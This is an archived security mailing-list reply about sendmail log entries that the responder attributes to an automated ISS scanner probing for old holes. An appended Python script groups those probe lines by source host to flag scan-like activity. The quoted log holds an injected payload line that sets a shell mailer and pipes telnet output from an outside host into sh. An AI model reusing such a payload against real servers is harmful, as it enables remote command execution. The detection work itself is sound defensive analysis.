Security Incidents mailing list archives
Re: sendmail attack?
From: Al Huger - Mail Account <ah1 () SECURITYFOCUS COM>
Date: Thu, 14 Dec 2000 09:32:28 -0800
(xxx.xxx.xxx.xxx) Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from Dial22.xxx.xxx: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh/tmp/tel.out "
Dec 9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: vrfy root
Dec 9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn root
Dec 9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn decode
Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Obviously is a sendmail attack try. Any suggestions, comments?
That is most likely someone scanning you with the ISS Scanner. I am not clear whether that is the freeware version of the commercial one. Either way, it's an automated scan looking for really, really deprecated ancient sendmail holes which I am sure you do not have.

-al
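Added example, not part of either message in this thread: a small log triage script that groups the sendmail probe messages quoted above by source host and reports hosts that tried several different probe kinds, the burst pattern the reply attributes to an automated scan. The sample lines, host names, addresses and the threshold of three kinds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the syslog format quoted in the post;
# host names and addresses are placeholders, not values from the thread.
SAMPLE_LOG = """\
Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from dial22.example.net: newline in string "x^M Croot^M"
Dec 9 01:01:05 main sendmail[856]: NOQUEUE: dial22.example.net [192.0.2.22]: vrfy root
Dec 9 01:01:06 main sendmail[857]: NOQUEUE: dial22.example.net [192.0.2.22]: expn root
Dec 9 01:01:06 main sendmail[858]: NOQUEUE: dial22.example.net [192.0.2.22]: expn decode
Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from dial22.example.net [192.0.2.22] (192.0.2.22)
Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from dial22.example.net [192.0.2.22] (192.0.2.22)
Dec 9 02:10:00 main sendmail[901]: NOQUEUE: mx.example.org [198.51.100.7]: vrfy postmaster
"""

# Syslog header, "sendmail[pid]:", then queue id (or NOQUEUE), then the message.
PREFIX = re.compile(r"^\w{3}\s+\d+ [\d:]{8} \S+ sendmail\[\d+\]: \S+: (.*)$")
# One pattern per message shape seen in the post; each names the host and probe kind.
RULES = [
    re.compile(r"^(?P<kind>POSSIBLE ATTACK) from (?P<host>[^\s:]+):"),
    re.compile(r'^"(?P<kind>wiz|debug)" command from (?P<host>\S+)'),
    re.compile(r"^(?P<host>\S+) \[[^\]]+\]: (?P<kind>vrfy|expn)\b"),
]

def classify(line):
    """Return (host, probe_kind) for a sendmail probe line, else None."""
    m = PREFIX.match(line)
    if not m:
        return None
    for rule in RULES:
        hit = rule.match(m.group(1))
        if hit:
            return hit.group("host").lower(), hit.group("kind").lower()
    return None

def scanner_like(log_text, min_kinds=3):
    """Map host -> sorted probe kinds for hosts with >= min_kinds distinct kinds."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            seen[hit[0]].add(hit[1])
    return {h: sorted(k) for h, k in seen.items() if len(k) >= min_kinds}

if __name__ == "__main__":
    for host, kinds in scanner_like(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(kinds)}")
```

A lone `vrfy` from another host stays below the threshold and is not reported, which keeps ordinary address verification from being counted as a scan.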